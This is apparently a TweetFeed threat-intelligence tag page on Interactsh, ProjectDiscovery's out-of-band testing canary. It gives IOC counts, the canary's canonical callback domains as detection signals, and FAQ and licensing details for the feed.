#interactsh

ProjectDiscovery's OAST canary (out-of-band application security testing) - flagged when attackers use it for blind XSS, SSRF or RCE confirmation


#interactsh

OAST canary used by attackers for blind XSS / SSRF / RCE detection

IOCs by window

Today

0

IOCs tagged #interactsh

Week

0

IOCs tagged #interactsh

Month

0

IOCs tagged #interactsh

Year

2,371

IOCs tagged #interactsh

Counts as of 2026-04-29. Regenerated daily.

About #interactsh

  • Type: OAST (Out-of-band Application Security Testing) canary tool maintained by ProjectDiscovery. Issues unique callback URLs that record DNS / HTTP / SMTP requests, used for confirming blind vulnerabilities (blind XSS, SSRF, OOB RCE).
  • Why IOCs appear: researchers tag URLs and IPs that hit interactsh as #interactsh when they observe attackers using the canary in real-world exploitation - typically as confirmation infrastructure paired with payloads against vulnerable web apps.
  • Detection signals: callback domains under oast.live, oast.fun, oast.me, oast.online, oast.pro, oast.site. Self-hosted instances may use custom domains; defenders can block the canonical ProjectDiscovery zones in egress filters when not legitimately used.
  • References: projectdiscovery/interactsh on GitHub.

Recent IOCs tagged #interactsh

No IOCs tagged #interactsh in the past 30 days. Year aggregate: 2,371. For longer-window data, query api.tweetfeed.live/v1/year/interactsh.

Related tags

Tags that frequently co-occur with #interactsh.

See all tags on the Dashboard or browse the full IOC feed.

Frequently asked questions

What is Interactsh?

Interactsh is an OAST (out-of-band application security testing) canary tool maintained by ProjectDiscovery. It issues unique callback URLs that record DNS, HTTP and SMTP requests directed at them, letting offensive security testers confirm blind vulnerabilities like blind XSS, SSRF and out-of-band RCE. The tool is open-source and free to self-host.

Why are interactsh URLs in a malicious-IOC feed?

Interactsh is dual-use. Researchers tag a URL as #interactsh when they observe an attacker - or commodity exploit tooling - using interactsh callbacks against a real production target. The URL is not malicious in itself, but its presence in a request log indicates active exploitation attempts and is useful as a detection signal.

How is this list updated?

Every 15 minutes. The TweetFeed pipeline scrapes RSS feeds from public Twitter/X security researcher accounts and lists, extracts IOCs, tags them with the relevant malware family or threat actor, and republishes the result in CSV, JSON and RSS. Interactsh-tagged IOCs are surfaced on this page within the next 15-minute tick. The page itself is regenerated daily by a GitHub Action.

What is the license? Can I use this commercially?

All TweetFeed IOC data, including this Interactsh subset, is released under CC0 1.0 Universal (Public Domain Dedication). No attribution required, no warranty. Commercial use is allowed. The TweetFeed website code and branding are not covered by CC0.

License

Interactsh IOC data: CC0 1.0 Public Domain. No attribution required, no warranty. Source code for the pipeline: github.com/0xDanielLopez/TweetFeed (MIT).